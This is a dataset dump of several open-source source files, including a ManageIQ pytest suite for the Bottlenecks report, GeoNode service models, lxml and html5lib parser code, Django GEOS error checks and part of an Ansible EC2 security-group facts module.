repo_name (stringlengths 5-100) | path (stringlengths 4-375) | copies (stringclasses, 991 values) | size (stringlengths 4-7) | content (stringlengths 666-1M) | license (stringclasses, 15 values)
---|---|---|---|---|---|
lkhomenk/integration_tests | cfme/tests/optimize/test_bottlenecks.py | 5 | 7933 | # -*- coding: utf-8 -*-
import fauxfactory
import pytest
from datetime import timedelta
from cfme.optimize.bottlenecks import Bottlenecks
from cfme.utils import conf
from cfme.utils.appliance.implementations.ui import navigate_to
from cfme.utils.blockers import BZ
from cfme.utils.timeutil import parsetime
from cfme.utils.ssh import SSHClient
pytestmark = pytest.mark.uncollectif(lambda appliance: appliance.is_pod)
@pytest.fixture(scope="module")
def temp_appliance_extended_db(temp_appliance_preconfig):
app = temp_appliance_preconfig
app.evmserverd.stop()
app.db.extend_partition()
app.start_evm_service()
return app
@pytest.fixture(scope="module")
def db_tbl(temp_appliance_extended_db):
app = temp_appliance_extended_db
return app.db.client['bottleneck_events']
@pytest.fixture(scope="module")
def db_events(temp_appliance_extended_db, db_tbl):
app = temp_appliance_extended_db
return app.db.client.session.query(db_tbl.timestamp,
db_tbl.resource_type, db_tbl.resource_name, db_tbl.event_type, db_tbl.severity, db_tbl.message)
@pytest.fixture(scope="module")
def db_restore(temp_appliance_extended_db):
app = temp_appliance_extended_db
app.evmserverd.stop()
app.db.drop()
db_storage_hostname = conf.cfme_data['bottlenecks']['hostname']
db_storage_ssh = SSHClient(hostname=db_storage_hostname, **conf.credentials['bottlenecks'])
with db_storage_ssh as ssh_client:
# Different files for different versions
ver = "_58" if temp_appliance_extended_db.version < '5.9' else "_59"
rand_filename = "/tmp/v2_key_{}".format(fauxfactory.gen_alphanumeric())
ssh_client.get_file("/home/backups/otsuman_db_bottlenecks/v2_key{}".format(ver),
rand_filename)
dump_filename = "/tmp/db_dump_{}".format(fauxfactory.gen_alphanumeric())
ssh_client.get_file("/home/backups/otsuman_db_bottlenecks/db.backup{}".format(ver),
dump_filename)
region_filename = "/tmp/REGION_{}".format(fauxfactory.gen_alphanumeric())
ssh_client.get_file("/home/backups/otsuman_db_bottlenecks/REGION{}".format(ver),
region_filename)
guid_filename = "/tmp/GUID_{}".format(fauxfactory.gen_alphanumeric())
ssh_client.get_file("/home/backups/otsuman_db_bottlenecks/GUID{}".format(ver),
guid_filename)
with app.ssh_client as ssh_client:
ssh_client.put_file(rand_filename, "/var/www/miq/vmdb/certs/v2_key")
ssh_client.put_file(dump_filename, "/tmp/evm_db.backup")
ssh_client.put_file(region_filename, "/var/www/miq/vmdb/REGION")
ssh_client.put_file(guid_filename, "/var/www/miq/vmdb/GUID")
app.db.restore()
app.start_evm_service()
app.wait_for_web_ui()
@pytest.mark.tier(2)
def test_bottlenecks_report_event_groups(temp_appliance_extended_db, db_restore, db_tbl, db_events):
""" Checks event_groups selectbox in report tab. It should filter events by type """
with temp_appliance_extended_db:
view = navigate_to(Bottlenecks, 'All')
# Enabling this option to show all possible values
view.report.show_host_events.fill(True)
view.report.event_groups.fill('Capacity')
rows = view.report.event_details.rows()
# Compare number of rows in bottleneck's table with number of rows in db
assert sum(1 for row in rows) == db_events.filter(db_tbl.event_type == 'DiskUsage').count()
view.report.event_groups.fill('Utilization')
rows = view.report.event_details.rows()
assert sum(1 for row in rows) == db_events.filter(db_tbl.event_type != 'DiskUsage').count()
@pytest.mark.tier(2)
def test_bottlenecks_report_show_host_events(temp_appliance_extended_db, db_restore, db_events):
""" Checks host_events checkbox in report tab. It should show or not host events """
with temp_appliance_extended_db:
view = navigate_to(Bottlenecks, 'All')
view.report.show_host_events.fill(False)
rows = view.report.event_details.rows(type='Host / Node')
# Checking that rows with value 'Host / Node' are absent from the table
assert not sum(1 for row in rows)
view.report.show_host_events.fill(True)
rows = view.report.event_details.rows()
# Compare number of rows in bottleneck's table with number of rows in db
assert sum(1 for row in rows) == db_events.count()
@pytest.mark.tier(2)
def test_bottlenecks_report_time_zone(temp_appliance_extended_db, db_restore, db_tbl, db_events):
""" Checks time zone selectbox in report tab. It should change time zone of events in table """
with temp_appliance_extended_db:
view = navigate_to(Bottlenecks, 'All')
row = view.report.event_details[0]
# Selecting a row by a unique value
db_row = db_events.filter(db_tbl.message == row[5].text)
# Compare bottleneck's table timestamp with db
assert row[0].text == db_row[0][0].strftime(parsetime.american_with_utc_format)
# Changing time zone
view.report.time_zone.fill('(GMT-04:00) La Paz')
row = view.report.event_details[0]
assert row[0].text == (db_row[0][0] - timedelta(hours=4)).strftime("%m/%d/%y %H:%M:%S -04")
@pytest.mark.meta(blockers=[BZ(1507565, forced_streams=["5.8"])])
@pytest.mark.tier(2)
def test_bottlenecks_summary_event_groups(temp_appliance_extended_db, db_restore, db_tbl,
db_events):
""" Checks event_groups selectbox in summary tab. It should filter events by type """
with temp_appliance_extended_db:
view = navigate_to(Bottlenecks, 'All')
# Enabling this option to show all possible values
view.summary.show_host_events.fill(True)
view.summary.event_groups.fill('Capacity')
events = view.summary.chart.get_events()
# Compare number of events in chart with number of rows in db
assert len(events) == db_events.filter(db_tbl.event_type == 'DiskUsage').count()
view.summary.event_groups.fill('Utilization')
events = view.summary.chart.get_events()
assert len(events) == db_events.filter(db_tbl.event_type != 'DiskUsage').count()
@pytest.mark.tier(2)
def test_bottlenecks_summary_show_host_events(temp_appliance_extended_db, db_restore, db_events):
""" Checks host_events checkbox in summary tab. It should show or not host events """
with temp_appliance_extended_db:
view = navigate_to(Bottlenecks, 'All')
view.summary.show_host_events.fill(False)
# Checking that events with value 'Host / Node' are absent from the table
events = view.summary.chart.get_events()
assert not sum(1 for event in events if event.type == 'Host')
view.summary.show_host_events.fill(True)
events = view.summary.chart.get_events()
# Compare number of events in chart with number of rows in db
assert len(events) == db_events.count()
@pytest.mark.tier(2)
def test_bottlenecks_summary_time_zone(temp_appliance_extended_db, db_restore, db_tbl, db_events):
""" Checks time zone selectbox in summary tab. It should change time zone of events in chart """
with temp_appliance_extended_db:
view = navigate_to(Bottlenecks, 'All')
events = view.summary.chart.get_events()
# Selecting a row by a unique value
db_row = db_events.filter(db_tbl.message == events[0].message)
# Compare event timestamp with db
assert events[0].time_stamp == db_row[0][0].strftime(parsetime.iso_with_utc_format)
# Changing time zone
view.summary.time_zone.fill('(GMT-04:00) La Paz')
events = view.summary.chart.get_events()
assert events[0].time_stamp == (db_row[0][0] - timedelta(hours=4)).strftime("%Y-%m-%d "
"%H:%M:%S -04")
| gpl-2.0 |
gdreich/geonode | geonode/services/models.py | 6 | 6197 | # -*- coding: utf-8 -*-
#########################################################################
#
# Copyright (C) 2016 OSGeo
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#########################################################################
import logging
from django.conf import settings
from django.db import models
from geoserver.catalog import FailedRequestError, Catalog
from geonode.base.models import ResourceBase
from geonode.services.enumerations import SERVICE_TYPES, SERVICE_METHODS, GXP_PTYPES
from geonode.layers.models import Layer
from django.utils.translation import ugettext_lazy as _
from django.db.models import signals
from geonode.people.enumerations import ROLE_VALUES
from geonode.security.models import remove_object_permissions
STATUS_VALUES = [
'pending',
'failed',
'process'
]
logger = logging.getLogger("geonode.services")
"""
geonode.services
"""
class Service(ResourceBase):
"""
Service Class to represent remote Geo Web Services
"""
type = models.CharField(max_length=4, choices=SERVICE_TYPES)
method = models.CharField(max_length=1, choices=SERVICE_METHODS)
# with service, version and request etc stripped off
base_url = models.URLField(unique=True, db_index=True)
version = models.CharField(max_length=10, null=True, blank=True)
# Should force to slug?
name = models.CharField(max_length=255, unique=True, db_index=True)
description = models.CharField(max_length=255, null=True, blank=True)
online_resource = models.URLField(False, null=True, blank=True)
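# NOTE: the positional False here (and on workspace_ref below) most likely
# targeted the old Django verify_exists argument; as written it sets
# verbose_name=False.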
fees = models.CharField(max_length=1000, null=True, blank=True)
access_constraints = models.CharField(max_length=255, null=True, blank=True)
connection_params = models.TextField(null=True, blank=True)
username = models.CharField(max_length=50, null=True, blank=True)
password = models.CharField(max_length=50, null=True, blank=True)
api_key = models.CharField(max_length=255, null=True, blank=True)
workspace_ref = models.URLField(False, null=True, blank=True)
store_ref = models.URLField(null=True, blank=True)
resources_ref = models.URLField(null=True, blank=True)
profiles = models.ManyToManyField(
settings.AUTH_USER_MODEL, through='ServiceProfileRole')
created = models.DateTimeField(auto_now_add=True)
last_updated = models.DateTimeField(auto_now=True)
first_noanswer = models.DateTimeField(null=True, blank=True)
noanswer_retries = models.PositiveIntegerField(null=True, blank=True)
external_id = models.IntegerField(null=True, blank=True)
parent = models.ForeignKey(
'services.Service', null=True, blank=True, related_name='service_set')
# Supported Capabilities
def __unicode__(self):
return self.name
@property
def ptype(self):
# Return the gxp ptype that should be used to display layers
return GXP_PTYPES[self.type]
def get_absolute_url(self):
return '/services/%i' % self.id
class Meta(ResourceBase.Meta):
pass
class ServiceProfileRole(models.Model):
"""
ServiceProfileRole is an intermediate model to bind Profiles and Services and apply roles.
"""
profiles = models.ForeignKey(settings.AUTH_USER_MODEL)
service = models.ForeignKey(Service)
role = models.CharField(choices=ROLE_VALUES, max_length=255, help_text=_(
'function performed by the responsible party'))
class ServiceLayer(models.Model):
service = models.ForeignKey(Service)
layer = models.ForeignKey(Layer, null=True)
typename = models.CharField(_("Layer Name"), max_length=255)
title = models.CharField(_("Layer Title"), max_length=512)
description = models.TextField(_("Layer Description"), null=True)
styles = models.TextField(_("Layer Styles"), null=True)
class WebServiceHarvestLayersJob(models.Model):
service = models.OneToOneField(Service, blank=False, null=False)
status = models.CharField(choices=[(
x, x) for x in STATUS_VALUES], max_length=10, blank=False, null=False, default='pending')
class WebServiceRegistrationJob(models.Model):
base_url = models.URLField(unique=True)
type = models.CharField(max_length=4, choices=SERVICE_TYPES)
status = models.CharField(choices=[(
x, x) for x in STATUS_VALUES], max_length=10, blank=False, null=False, default='pending')
def post_save_service(instance, sender, created, **kwargs):
if created:
instance.set_default_permissions()
def pre_delete_service(instance, sender, **kwargs):
for layer in instance.layer_set.all():
layer.delete()
# if instance.method == 'H':
# gn = Layer.objects.gn_catalog
# gn.control_harvesting_task('stop', [instance.external_id])
# gn.control_harvesting_task('remove', [instance.external_id])
if instance.method == 'C':
try:
_user = settings.OGC_SERVER['default']['USER']
_password = settings.OGC_SERVER['default']['PASSWORD']
gs = Catalog(settings.OGC_SERVER['default']['LOCATION'] + "rest",
_user, _password)
cascade_store = gs.get_store(
instance.name, settings.CASCADE_WORKSPACE)
gs.delete(cascade_store, recurse=True)
except FailedRequestError:
logger.error(
"Could not delete cascading WMS Store for %s - maybe already gone" % instance.name)
remove_object_permissions(instance.get_self_resource())
signals.pre_delete.connect(pre_delete_service, sender=Service)
signals.post_save.connect(post_save_service, sender=Service)
| gpl-3.0 |
neumerance/cloudloon2 | .venv/lib/python2.7/site-packages/lxml/html/soupparser.py | 53 | 4360 | __doc__ = """External interface to the BeautifulSoup HTML parser.
"""
__all__ = ["fromstring", "parse", "convert_tree"]
from lxml import etree, html
from BeautifulSoup import \
BeautifulSoup, Tag, Comment, ProcessingInstruction, NavigableString
def fromstring(data, beautifulsoup=None, makeelement=None, **bsargs):
"""Parse a string of HTML data into an Element tree using the
BeautifulSoup parser.
Returns the root ``<html>`` Element of the tree.
You can pass a different BeautifulSoup parser through the
`beautifulsoup` keyword, and a different Element factory function
through the `makeelement` keyword. By default, the standard
``BeautifulSoup`` class and the default factory of `lxml.html` are
used.
"""
return _parse(data, beautifulsoup, makeelement, **bsargs)
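# Minimal usage sketch (hypothetical input; assumes BeautifulSoup 3 is
# importable as above):
#   root = fromstring("<p>Hello, <b>soup</b></p>")
#   root.tag  # -> 'html' (the parsed fragment is wrapped in an html root)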
def parse(file, beautifulsoup=None, makeelement=None, **bsargs):
"""Parse a file into an ElemenTree using the BeautifulSoup parser.
You can pass a different BeautifulSoup parser through the
`beautifulsoup` keyword, and a different Element factory function
through the `makeelement` keyword. By default, the standard
``BeautifulSoup`` class and the default factory of `lxml.html` are
used.
"""
if not hasattr(file, 'read'):
file = open(file)
root = _parse(file, beautifulsoup, makeelement, **bsargs)
return etree.ElementTree(root)
def convert_tree(beautiful_soup_tree, makeelement=None):
"""Convert a BeautifulSoup tree to a list of Element trees.
Returns a list instead of a single root Element to support
HTML-like soup with more than one root element.
You can pass a different Element factory through the `makeelement`
keyword.
"""
if makeelement is None:
makeelement = html.html_parser.makeelement
root = _convert_tree(beautiful_soup_tree, makeelement)
children = root.getchildren()
for child in children:
root.remove(child)
return children
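# For example (sketch): soup with two top-level elements yields two trees,
# e.g. convert_tree(BeautifulSoup("<p>a</p><p>b</p>")) -> [<Element p>, <Element p>]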
# helpers
def _parse(source, beautifulsoup, makeelement, **bsargs):
if beautifulsoup is None:
beautifulsoup = BeautifulSoup
if makeelement is None:
makeelement = html.html_parser.makeelement
if 'convertEntities' not in bsargs:
bsargs['convertEntities'] = 'html'
tree = beautifulsoup(source, **bsargs)
root = _convert_tree(tree, makeelement)
# from ET: wrap the document in a html root element, if necessary
if len(root) == 1 and root[0].tag == "html":
return root[0]
root.tag = "html"
return root
def _convert_tree(beautiful_soup_tree, makeelement):
root = makeelement(beautiful_soup_tree.name,
attrib=dict(beautiful_soup_tree.attrs))
_convert_children(root, beautiful_soup_tree, makeelement)
return root
def _convert_children(parent, beautiful_soup_tree, makeelement):
SubElement = etree.SubElement
et_child = None
for child in beautiful_soup_tree:
if isinstance(child, Tag):
et_child = SubElement(parent, child.name, attrib=dict(
[(k, unescape(v)) for (k,v) in child.attrs]))
_convert_children(et_child, child, makeelement)
elif type(child) is NavigableString:
_append_text(parent, et_child, unescape(child))
else:
if isinstance(child, Comment):
parent.append(etree.Comment(child))
elif isinstance(child, ProcessingInstruction):
parent.append(etree.ProcessingInstruction(
*child.split(' ', 1)))
else: # CData
_append_text(parent, et_child, unescape(child))
def _append_text(parent, element, text):
if element is None:
parent.text = (parent.text or '') + text
else:
element.tail = (element.tail or '') + text
# copied from ET's ElementSoup
try:
from html.entities import name2codepoint # Python 3
except ImportError:
from htmlentitydefs import name2codepoint
import re
handle_entities = re.compile(r"&(\w+);").sub
def unescape(string):
if not string:
return ''
# work around oddities in BeautifulSoup's entity handling
def unescape_entity(m):
try:
return unichr(name2codepoint[m.group(1)])
except KeyError:
return m.group(0) # use as is
return handle_entities(unescape_entity, string)
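# e.g. (illustrative): unescape("a &amp; b") -> u'a & b' via the
# name2codepoint lookup above; unknown entities are returned unchanged.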
| apache-2.0 |
MyAOSP/external_chromium_org | tools/json_schema_compiler/dart_generator_test.py | 25 | 2388 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import sys
import unittest
from compiler import GenerateSchema
# If --rebase is passed to this test, this is set to True, indicating the test
# output should be re-generated for each test (rather than running the tests
# themselves).
REBASE_MODE = False
# The directory containing the input and expected output files corresponding
# to each test name.
TESTS_DIR = 'dart_test'
class DartTest(unittest.TestCase):
def _RunTest(self, test_filename):
'''Given the name of a test, runs compiler.py on the file:
TESTS_DIR/test_filename.idl
and compares it to the output in the file:
TESTS_DIR/test_filename.dart
'''
file_rel = os.path.join(TESTS_DIR, test_filename)
output_dir = None
if REBASE_MODE:
output_dir = TESTS_DIR
output_code = GenerateSchema('dart', ['%s.idl' % file_rel], TESTS_DIR,
output_dir, None, None)
if not REBASE_MODE:
with open('%s.dart' % file_rel) as f:
expected_output = f.read()
# Remove the first line of the output code (as it contains the filename).
# Also remove all blank lines, ignoring them from the comparison.
# Compare with lists instead of strings for clearer diffs (especially with
# whitespace) when a test fails.
self.assertEqual([l for l in expected_output.split('\n') if l],
[l for l in output_code.split('\n')[1:] if l])
def setUp(self):
# Increase the maximum diff amount to see the full diff on a failed test.
self.maxDiff = 2000
def testComments(self):
self._RunTest('comments')
def testDictionaries(self):
self._RunTest('dictionaries')
def testEmptyNamespace(self):
self._RunTest('empty_namespace')
def testEmptyType(self):
self._RunTest('empty_type')
def testEvents(self):
self._RunTest('events')
def testBasicFunction(self):
self._RunTest('functions')
def testOperatableType(self):
self._RunTest('operatable_type')
def testTags(self):
self._RunTest('tags')
if __name__ == '__main__':
if '--rebase' in sys.argv:
print "Running in rebase mode."
REBASE_MODE = True
sys.argv.remove('--rebase')
unittest.main()
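# To regenerate the expected .dart outputs instead of comparing against them,
# pass the flag handled above (sketch): ./dart_generator_test.py --rebase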
| bsd-3-clause |
NL66278/odoo | addons/account_cancel/__openerp__.py | 52 | 1667 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Cancel Journal Entries',
'version': '1.1',
'author': 'OpenERP SA',
'category': 'Accounting & Finance',
'description': """
Allows canceling accounting entries.
====================================
This module adds 'Allow Canceling Entries' field on form view of account journal.
If set to true it allows user to cancel entries & invoices.
""",
'website': 'https://www.odoo.com/page/accounting',
'images': ['images/account_cancel.jpeg'],
'depends' : ['account'],
'data': ['account_cancel_view.xml' ],
'demo': [],
'installable': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
samthor/intellij-community | python/lib/Lib/site-packages/django/contrib/gis/geos/prototypes/errcheck.py | 623 | 3522 | """
Error checking functions for GEOS ctypes prototype functions.
"""
import os
from ctypes import c_void_p, string_at, CDLL
from django.contrib.gis.geos.error import GEOSException
from django.contrib.gis.geos.libgeos import GEOS_VERSION
from django.contrib.gis.geos.prototypes.threadsafe import GEOSFunc
# Getting the `free` routine used to free the memory allocated for
# string pointers returned by GEOS.
if GEOS_VERSION >= (3, 1, 1):
# In versions 3.1.1 and above, `GEOSFree` was added to the C API
# because `free` isn't always available on all platforms.
free = GEOSFunc('GEOSFree')
free.argtypes = [c_void_p]
free.restype = None
else:
# Getting the `free` routine from the C library of the platform.
if os.name == 'nt':
# On NT, use the MS C library.
libc = CDLL('msvcrt')
else:
# On POSIX platforms the C library is obtained by passing None into `CDLL`.
libc = CDLL(None)
free = libc.free
### ctypes error checking routines ###
def last_arg_byref(args):
"Returns the last C argument's value by reference."
return args[-1]._obj.value
def check_dbl(result, func, cargs):
"Checks the status code and returns the double value passed in by reference."
# Checking the status code
if result != 1: return None
# Double passed in by reference, return its value.
return last_arg_byref(cargs)
def check_geom(result, func, cargs):
"Error checking on routines that return Geometries."
if not result:
raise GEOSException('Error encountered checking Geometry returned from GEOS C function "%s".' % func.__name__)
return result
def check_minus_one(result, func, cargs):
"Error checking on routines that should not return -1."
if result == -1:
raise GEOSException('Error encountered in GEOS C function "%s".' % func.__name__)
else:
return result
def check_predicate(result, func, cargs):
"Error checking for unary/binary predicate functions."
val = ord(result) # getting the ordinal from the character
if val == 1: return True
elif val == 0: return False
else:
raise GEOSException('Error encountered on GEOS C predicate function "%s".' % func.__name__)
def check_sized_string(result, func, cargs):
"""
Error checking for routines that return explicitly sized strings.
This frees the memory allocated by GEOS at the result pointer.
"""
if not result:
raise GEOSException('Invalid string pointer returned by GEOS C function "%s"' % func.__name__)
# A c_size_t object is passed in by reference for the second
# argument on these routines, and it's needed to determine the
# correct size.
s = string_at(result, last_arg_byref(cargs))
# Freeing the memory allocated within GEOS
free(result)
return s
def check_string(result, func, cargs):
"""
Error checking for routines that return strings.
This frees the memory allocated by GEOS at the result pointer.
"""
if not result: raise GEOSException('Error encountered checking string return value in GEOS C function "%s".' % func.__name__)
# Getting the string value at the pointer address.
s = string_at(result)
# Freeing the memory allocated within GEOS
free(result)
return s
def check_zero(result, func, cargs):
"Error checking on routines that should not return 0."
if result == 0:
raise GEOSException('Error encountered in GEOS C function "%s".' % func.__name__)
else:
return result
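# These routines are meant to be attached as ctypes errcheck hooks on the
# GEOS prototypes, e.g. (sketch; the GEOSArea binding is an assumption):
#   geos_area = GEOSFunc('GEOSArea')
#   geos_area.errcheck = check_dbl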
| apache-2.0 |
sunlianqiang/kbengine | kbe/res/scripts/common/Lib/site-packages/pip/_vendor/html5lib/treebuilders/etree.py | 915 | 12621 | from __future__ import absolute_import, division, unicode_literals
from pip._vendor.six import text_type
import re
from . import _base
from .. import ihatexml
from .. import constants
from ..constants import namespaces
from ..utils import moduleFactoryFactory
tag_regexp = re.compile("{([^}]*)}(.*)")
def getETreeBuilder(ElementTreeImplementation, fullTree=False):
ElementTree = ElementTreeImplementation
ElementTreeCommentType = ElementTree.Comment("asd").tag
class Element(_base.Node):
def __init__(self, name, namespace=None):
self._name = name
self._namespace = namespace
self._element = ElementTree.Element(self._getETreeTag(name,
namespace))
if namespace is None:
self.nameTuple = namespaces["html"], self._name
else:
self.nameTuple = self._namespace, self._name
self.parent = None
self._childNodes = []
self._flags = []
def _getETreeTag(self, name, namespace):
if namespace is None:
etree_tag = name
else:
etree_tag = "{%s}%s" % (namespace, name)
return etree_tag
def _setName(self, name):
self._name = name
self._element.tag = self._getETreeTag(self._name, self._namespace)
def _getName(self):
return self._name
name = property(_getName, _setName)
def _setNamespace(self, namespace):
self._namespace = namespace
self._element.tag = self._getETreeTag(self._name, self._namespace)
def _getNamespace(self):
return self._namespace
namespace = property(_getNamespace, _setNamespace)
def _getAttributes(self):
return self._element.attrib
def _setAttributes(self, attributes):
# Delete existing attributes first
# XXX - there may be a better way to do this...
for key in list(self._element.attrib.keys()):
del self._element.attrib[key]
for key, value in attributes.items():
if isinstance(key, tuple):
name = "{%s}%s" % (key[2], key[1])
else:
name = key
self._element.set(name, value)
attributes = property(_getAttributes, _setAttributes)
def _getChildNodes(self):
return self._childNodes
def _setChildNodes(self, value):
del self._element[:]
self._childNodes = []
for element in value:
self.insertChild(element)
childNodes = property(_getChildNodes, _setChildNodes)
def hasContent(self):
"""Return true if the node has children or text"""
return bool(self._element.text or len(self._element))
def appendChild(self, node):
self._childNodes.append(node)
self._element.append(node._element)
node.parent = self
def insertBefore(self, node, refNode):
index = list(self._element).index(refNode._element)
self._element.insert(index, node._element)
node.parent = self
def removeChild(self, node):
self._element.remove(node._element)
node.parent = None
def insertText(self, data, insertBefore=None):
if not(len(self._element)):
if not self._element.text:
self._element.text = ""
self._element.text += data
elif insertBefore is None:
# Insert the text as the tail of the last child element
if not self._element[-1].tail:
self._element[-1].tail = ""
self._element[-1].tail += data
else:
# Insert the text before the specified node
children = list(self._element)
index = children.index(insertBefore._element)
if index > 0:
if not self._element[index - 1].tail:
self._element[index - 1].tail = ""
self._element[index - 1].tail += data
else:
if not self._element.text:
self._element.text = ""
self._element.text += data
def cloneNode(self):
element = type(self)(self.name, self.namespace)
for name, value in self.attributes.items():
element.attributes[name] = value
return element
def reparentChildren(self, newParent):
if newParent.childNodes:
newParent.childNodes[-1]._element.tail += self._element.text
else:
if not newParent._element.text:
newParent._element.text = ""
if self._element.text is not None:
newParent._element.text += self._element.text
self._element.text = ""
_base.Node.reparentChildren(self, newParent)
class Comment(Element):
def __init__(self, data):
# Use the superclass constructor to set all properties on the
# wrapper element
self._element = ElementTree.Comment(data)
self.parent = None
self._childNodes = []
self._flags = []
def _getData(self):
return self._element.text
def _setData(self, value):
self._element.text = value
data = property(_getData, _setData)
class DocumentType(Element):
def __init__(self, name, publicId, systemId):
Element.__init__(self, "<!DOCTYPE>")
self._element.text = name
self.publicId = publicId
self.systemId = systemId
def _getPublicId(self):
return self._element.get("publicId", "")
def _setPublicId(self, value):
if value is not None:
self._element.set("publicId", value)
publicId = property(_getPublicId, _setPublicId)
def _getSystemId(self):
return self._element.get("systemId", "")
def _setSystemId(self, value):
if value is not None:
self._element.set("systemId", value)
systemId = property(_getSystemId, _setSystemId)
class Document(Element):
def __init__(self):
Element.__init__(self, "DOCUMENT_ROOT")
class DocumentFragment(Element):
def __init__(self):
Element.__init__(self, "DOCUMENT_FRAGMENT")
def testSerializer(element):
rv = []
def serializeElement(element, indent=0):
if not(hasattr(element, "tag")):
element = element.getroot()
if element.tag == "<!DOCTYPE>":
if element.get("publicId") or element.get("systemId"):
publicId = element.get("publicId") or ""
systemId = element.get("systemId") or ""
rv.append("""<!DOCTYPE %s "%s" "%s">""" %
(element.text, publicId, systemId))
else:
rv.append("<!DOCTYPE %s>" % (element.text,))
elif element.tag == "DOCUMENT_ROOT":
rv.append("#document")
if element.text is not None:
rv.append("|%s\"%s\"" % (' ' * (indent + 2), element.text))
if element.tail is not None:
raise TypeError("Document node cannot have tail")
if hasattr(element, "attrib") and len(element.attrib):
raise TypeError("Document node cannot have attributes")
elif element.tag == ElementTreeCommentType:
rv.append("|%s<!-- %s -->" % (' ' * indent, element.text))
else:
assert isinstance(element.tag, text_type), \
"Expected unicode, got %s, %s" % (type(element.tag), element.tag)
nsmatch = tag_regexp.match(element.tag)
if nsmatch is None:
name = element.tag
else:
ns, name = nsmatch.groups()
prefix = constants.prefixes[ns]
name = "%s %s" % (prefix, name)
rv.append("|%s<%s>" % (' ' * indent, name))
if hasattr(element, "attrib"):
attributes = []
for name, value in element.attrib.items():
nsmatch = tag_regexp.match(name)
if nsmatch is not None:
ns, name = nsmatch.groups()
prefix = constants.prefixes[ns]
attr_string = "%s %s" % (prefix, name)
else:
attr_string = name
attributes.append((attr_string, value))
for name, value in sorted(attributes):
rv.append('|%s%s="%s"' % (' ' * (indent + 2), name, value))
if element.text:
rv.append("|%s\"%s\"" % (' ' * (indent + 2), element.text))
indent += 2
for child in element:
serializeElement(child, indent)
if element.tail:
rv.append("|%s\"%s\"" % (' ' * (indent - 2), element.tail))
serializeElement(element, 0)
return "\n".join(rv)
def tostring(element):
"""Serialize an element and its child nodes to a string"""
rv = []
filter = ihatexml.InfosetFilter()
def serializeElement(element):
if isinstance(element, ElementTree.ElementTree):
element = element.getroot()
if element.tag == "<!DOCTYPE>":
if element.get("publicId") or element.get("systemId"):
publicId = element.get("publicId") or ""
systemId = element.get("systemId") or ""
rv.append("""<!DOCTYPE %s PUBLIC "%s" "%s">""" %
(element.text, publicId, systemId))
else:
rv.append("<!DOCTYPE %s>" % (element.text,))
elif element.tag == "DOCUMENT_ROOT":
if element.text is not None:
rv.append(element.text)
if element.tail is not None:
raise TypeError("Document node cannot have tail")
if hasattr(element, "attrib") and len(element.attrib):
raise TypeError("Document node cannot have attributes")
for child in element:
serializeElement(child)
elif element.tag == ElementTreeCommentType:
rv.append("<!--%s-->" % (element.text,))
else:
# This is assumed to be an ordinary element
if not element.attrib:
rv.append("<%s>" % (filter.fromXmlName(element.tag),))
else:
attr = " ".join(["%s=\"%s\"" % (
filter.fromXmlName(name), value)
for name, value in element.attrib.items()])
rv.append("<%s %s>" % (element.tag, attr))
if element.text:
rv.append(element.text)
for child in element:
serializeElement(child)
rv.append("</%s>" % (element.tag,))
if element.tail:
rv.append(element.tail)
serializeElement(element)
return "".join(rv)
class TreeBuilder(_base.TreeBuilder):
documentClass = Document
doctypeClass = DocumentType
elementClass = Element
commentClass = Comment
fragmentClass = DocumentFragment
implementation = ElementTreeImplementation
def testSerializer(self, element):
return testSerializer(element)
def getDocument(self):
if fullTree:
return self.document._element
else:
if self.defaultNamespace is not None:
return self.document._element.find(
"{%s}html" % self.defaultNamespace)
else:
return self.document._element.find("html")
def getFragment(self):
return _base.TreeBuilder.getFragment(self)._element
return locals()
getETreeModule = moduleFactoryFactory(getETreeBuilder)
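# Typical use (sketch; assumes the stdlib ElementTree implementation):
#   import xml.etree.ElementTree as ET
#   TreeBuilder = getETreeModule(ET).TreeBuilder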
| lgpl-3.0 |
dimid/ansible-modules-extras | cloud/amazon/ec2_group_facts.py | 12 | 5047 | #!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: ec2_group_facts
short_description: Gather facts about ec2 security groups in AWS.
description:
- Gather facts about ec2 security groups in AWS.
version_added: "2.3"
author: "Henrique Rodrigues (github.com/Sodki)"
options:
filters:
description:
- A dict of filters to apply. Each dict item consists of a filter key and a filter value. See \
U(https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeSecurityGroups.html) for \
possible filters. Filter names and values are case sensitive. You can also use underscores (_) \
instead of dashes (-) in the filter keys, which will take precedence in case of conflict.
required: false
default: {}
notes:
- By default, the module will return all security groups. To limit results use the appropriate filters.
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
# Gather facts about all security groups
- ec2_group_facts:
# Gather facts about all security groups in a specific VPC
- ec2_group_facts:
filters:
vpc-id: vpc-12345678
# Gather facts about all security groups in a specific VPC
- ec2_group_facts:
filters:
